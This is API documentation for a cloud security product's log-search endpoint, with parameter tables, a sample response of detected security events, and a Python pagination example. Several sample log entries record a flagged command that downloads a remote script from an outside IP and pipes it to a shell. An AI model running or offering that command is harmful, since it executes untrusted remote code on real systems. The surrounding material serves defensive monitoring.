SearchLog

Last updated: 2024-12-06 15:40:03

1. API Description

Domain name for API request: cwp.intl.tencentcloudapi.com.

This API is used to query logs.

A maximum of 20 requests can be initiated per second for this API.

We recommend using API Explorer. It provides a range of capabilities, including online call, signature authentication, SDK code generation, and API quick search, and lets you view the request, the response, and auto-generated examples.

2. Input Parameters

The following request parameter list only provides API request parameters and some common parameters. For the complete common parameter list, see Common Request Parameters.

| Parameter Name | Required | Type | Description |
|---|---|---|---|
| Action | Yes | String | Common Params. The value used for this API: SearchLog. |
| Version | Yes | String | Common Params. The value used for this API: 2018-02-28. |
| Region | No | String | Common Params. This parameter is not required. |
| StartTime | Yes | Integer | Start time for logs to be searched and analyzed, which is a Unix timestamp in milliseconds |
| EndTime | Yes | Integer | End time for logs to be searched and analyzed, which is a Unix timestamp in milliseconds |
| QueryString | Yes | String | Statement for search and analysis, with a maximum length of 12 KB |
| Count | No | Integer | Number of raw logs returned for a single query. Maximum value: 1000. The Context parameter can be used to obtain subsequent logs. |
| Sort | No | String | Order for returning the raw logs. Valid values: asc (ascending), desc (descending). Default value: desc. |
| Context | No | String | Pass the Context value returned by the last API call to retrieve more subsequent logs. A total of up to 10,000 raw logs can be obtained, with a validity period of 1 hour. |

3. Output Parameters

| Parameter Name | Type | Description |
|---|---|---|
| Count | Integer | Number of raw logs matching the retrieval criteria |
| Context | String | Value to pass as the Context input parameter in a later call to retrieve more logs. It expires after 1 hour. |
| ListOver | Boolean | Whether all logs meeting the retrieval criteria have been returned. If not, use the Context parameter to retrieve more logs. |
| Analysis | Boolean | Whether the returned data is the SQL analysis result |
| Data | Array of LogInfo | Raw logs matching the retrieval criteria |
| RequestId | String | The unique request ID, generated by the server and returned for every request. If the request fails to reach the server for other reasons, no RequestId is returned. RequestId is required for locating a problem. |

4. Example

Example 1

Input Example

POST / HTTP/1.1
Host: cwp.intl.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: SearchLog
<Common request parameters>

{
    "Sort": "desc",
    "Count": 20,
    "QueryString": "",
    "StartTime": 1656641065449,
    "EndTime": 1656641965449
}

Output Example

{
    "Response": {
        "Analysis": false,
        "Context": "",
        "Count": 17,
        "Data": [
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-20/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5704\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS vulnerability on form structure page.\",\"id\":\"771\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html\",\"path\":\"\",\"fix\":\"Upgrade to version 2.4.6-90 and above or 2.4.39 and above\",\"cve_id\":\"CVE-2019-0217\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_auth_digest race condition vulnerability\",\"id\":\"767\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_auth_digest module enabled, and the Apache HTTP Server version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1. \",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-19/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5703\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin central_columns.lib.php  SQL injection vulnerability\",\"id\":\"772\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92512\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. Upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6633\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin dbase extension remote code execution vulnerability\",\"id\":\"764\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\",\"path\":\"\",\"fix\":\"Upgrade Apache HTTP Server to version 2.4.46\",\"cve_id\":\"CVE-2020-9490\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server http2_module denial-of-service vulnerability\",\"id\":\"769\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_http2 module enabled, and the Apache HTTP Server version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1. \",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92209\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version and avoid using weak passwords.\",\"cve_id\":\"CVE-2016-5734\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin authorized user remote command execution vulnerability\",\"id\":\"768\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-40/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6617\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x SQL injection vulnerability of export feature\",\"id\":\"765\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/display_export.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-25/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5732\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS vulnerability\",\"id\":\"770\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\",\"path\":\"\",\"fix\":\"Upgrade to version 2.4.44 and later.\",\"cve_id\":\"CVE-2020-11984\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_proxy_uwsgi buffer overflow vulnerability\",\"id\":\"766\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_proxy_uwsgi module enabled, and the version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1.\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Beijing-Beijing city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641844000
            },
            {
                "Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Beijing-Beijing city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641824000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:10:03 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:10:01 +0800 CST\",\"id\":\"3141559\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641520000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Shanghai-Shanghai city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641484000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Shanghai-Shanghai city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641464000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:07:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:07:01 +0800 CST\",\"id\":\"3141558\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641280000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:05:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:05:01 +0800 CST\",\"id\":\"3141557\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641160000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:04:05 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:04:01 +0800 CST\",\"id\":\"3141556\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641160000
            }
        ],
        "ListOver": true,
        "RequestId": "e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3"
    }
}
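
Consuming this response takes two steps the tables only imply: following Context until ListOver is true, and decoding each record's Content, which is a JSON document serialized into a string. The Python below is an added example, not code from this page or from the Tencent Cloud SDK; `call` and `fake_call` are hypothetical stand-ins for a signed SearchLog request, and the sample responses are constructed.

```python
import json
from collections import Counter

MAX_COUNT = 1000     # per-call ceiling for Count (parameter table)
MAX_TOTAL = 10_000   # most raw logs reachable through Context

def search_all(call, start_ms, end_ms, query="", page_size=MAX_COUNT):
    """Follow Context until ListOver is true. Returns (records, complete)."""
    if not 0 < page_size <= MAX_COUNT:
        raise ValueError("Count must be between 1 and 1000")
    records, context = [], ""
    while len(records) < MAX_TOTAL:
        params = {"StartTime": start_ms, "EndTime": end_ms, "Sort": "desc",
                  "QueryString": query, "Count": page_size}
        if context:
            params["Context"] = context
        resp = call(params)["Response"]
        records.extend(resp.get("Data") or [])
        if resp.get("ListOver"):
            return records[:MAX_TOTAL], True
        context = resp.get("Context") or ""
        if not context:  # unfinished but no cursor: report a partial result
            break
    return records[:MAX_TOTAL], False

def decode(record):
    """Content is a JSON document serialized into a string; None if unusable."""
    try:
        event = json.loads(record["Content"])
    except (KeyError, TypeError, ValueError):
        return None
    return event if isinstance(event, dict) else None

def triage(records):
    """Count events per cls_event_type; keep records whose Content won't parse."""
    by_type, undecodable = Counter(), []
    for rec in records:
        event = decode(rec)
        if event is None:
            undecodable.append(rec)
        else:
            by_type[event.get("cls_event_type", "unknown")] += 1
    return by_type, undecodable

# Constructed sample responses (not real data), keyed by the Context sent.
def _rec(content, ts):
    return {"Content": content, "FileName": "", "Source": "192.0.2.10", "TimeStamp": ts}

PAGES = {
    "": {"Response": {"Analysis": False, "Context": "ctx-2", "Count": 3, "ListOver": False, "Data": [
        _rec(json.dumps({"cls_event_type": "bruteattack", "dst_port": "22"}), 1656641844000),
        _rec(json.dumps({"cls_event_type": "bash", "rule_level": "High-risk"}), 1656641520000)]}},
    "ctx-2": {"Response": {"Analysis": False, "Context": "", "Count": 3, "ListOver": True, "Data": [
        _rec('{"cls_event_type":"bruteattack","event_type":""failed"}', 1656641484000)]}},
}

def fake_call(params):  # hypothetical transport; a real one signs and POSTs params
    return PAGES[params.get("Context", "")]
```

A `complete` value of False means the window held more logs than one Context chain could return, so the time range should be split before the counts are trusted.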

5. Developer Resources

SDK

TencentCloud API 3.0 integrates SDKs that support various programming languages to make it easier for you to call APIs.

Command Line Interface

6. Error Code

There is no error code related to the API business logic. For other error codes, please see Common Error Codes.
